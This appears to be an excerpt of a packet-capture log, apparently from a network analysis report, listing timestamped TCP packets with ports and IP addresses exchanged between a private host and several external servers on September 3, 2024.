Sep 3, 2024 17:13:20.285207987 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.285219908 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.285231113 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.285232067 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.285259962 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.285283089 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.291699886 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:20.296770096 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.296780109 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.296791077 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.296799898 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.296822071 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.296832085 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.296838045 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:20.296844006 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.296857119 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.297040939 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.297049999 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.297060966 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.341255903 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:20.524135113 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524215937 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.524274111 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524286032 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524296999 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524307966 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524321079 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524333000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524333000 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.524374008 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.524409056 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524420977 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524450064 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.524492025 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.524595976 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524609089 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524621010 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524637938 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524643898 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.524651051 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524662971 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524674892 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.524676085 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.524682999 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.524715900 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525053978 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525065899 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525077105 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525089025 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525089979 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525100946 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525114059 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525139093 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525196075 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525214911 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525237083 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525264025 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525366068 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525377989 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525388002 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525398016 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525408983 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525413036 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525422096 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525444031 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525460958 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525531054 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525542974 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525552988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525564909 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525576115 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525580883 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525588036 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525599957 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525614977 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525615931 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.525635004 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.525654078 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526125908 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526138067 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526149035 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526160002 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526185036 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526196957 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526277065 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526295900 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526305914 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526324987 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526343107 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526434898 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526448011 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526458025 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526469946 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526474953 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526484013 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526495934 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526500940 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526510000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526527882 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526530027 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526540041 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526550055 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526554108 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526561022 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526578903 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526582003 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526592016 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526603937 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526603937 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526616096 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526616096 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526627064 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526642084 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526669979 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526777029 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526791096 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526799917 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526809931 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526818991 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526824951 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526856899 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526922941 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526942015 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526952028 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526959896 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526962996 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526976109 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526987076 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.526993036 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.526997089 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.527009010 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.527021885 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.527025938 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.527031898 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.527040005 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.527045012 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.527064085 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.527070999 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.527076006 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.527089119 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.527098894 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.527101040 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:20.527112007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527115107 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.527124882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527137041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527154922 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.527194023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.527194023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.527198076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527213097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527256966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.527720928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527733088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527786970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.527786970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.527874947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527887106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527905941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527919054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527920008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.527930975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527944088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527956009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527965069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.527965069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.527968884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527980089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.527991056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528001070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528008938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528017044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528034925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528042078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528045893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528067112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528078079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528079987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528079987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528090000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528101921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528111935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528125048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528125048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528137922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528139114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528162003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528175116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528179884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528244972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528659105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528672934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528681040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528757095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528793097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528805971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528817892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528829098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528844118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528855085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528856039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528867960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528879881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528888941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528904915 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528928995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528935909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.528942108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528953075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.528991938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529002905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529002905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529045105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529076099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529088020 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.529098034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529109001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529119968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529128075 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.529134035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529146910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529150009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529150009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529160023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529196978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529196978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529582977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529594898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529604912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529618025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529643059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529686928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529736042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529747963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529757977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529768944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529783010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529793978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529802084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529802084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529812098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529824972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529835939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529846907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529851913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529856920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529856920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529870033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529881954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529891968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529896975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529901028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529908895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529922009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529932022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.529932976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.529951096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.530008078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.530539036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530551910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530587912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.530603886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.530612946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530625105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530637980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530648947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530657053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.530661106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530678988 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.530678988 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.530709982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.530899048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530910969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530920982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530931950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530942917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530955076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530966997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530977011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530987978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.530999899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531011105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531028032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531039953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531052113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531066895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531079054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531090021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531100035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531187057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531198025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531208992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531220913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531233072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531244040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531256914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531270981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531282902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531296968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531307936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531343937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.531404972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.531826019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531842947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531852961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531965971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531979084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.531990051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.532001019 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532011986 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532022953 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532036066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532047033 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532058001 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532068968 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532079935 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532115936 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532134056 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532145023 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532155991 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532171965 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532183886 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532196045 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532207966 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532217979 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532229900 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532241106 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532253027 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532263994 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532434940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.532720089 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532732964 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.532744884 CEST	80	49726	185.215.113.17	192.168.2.8
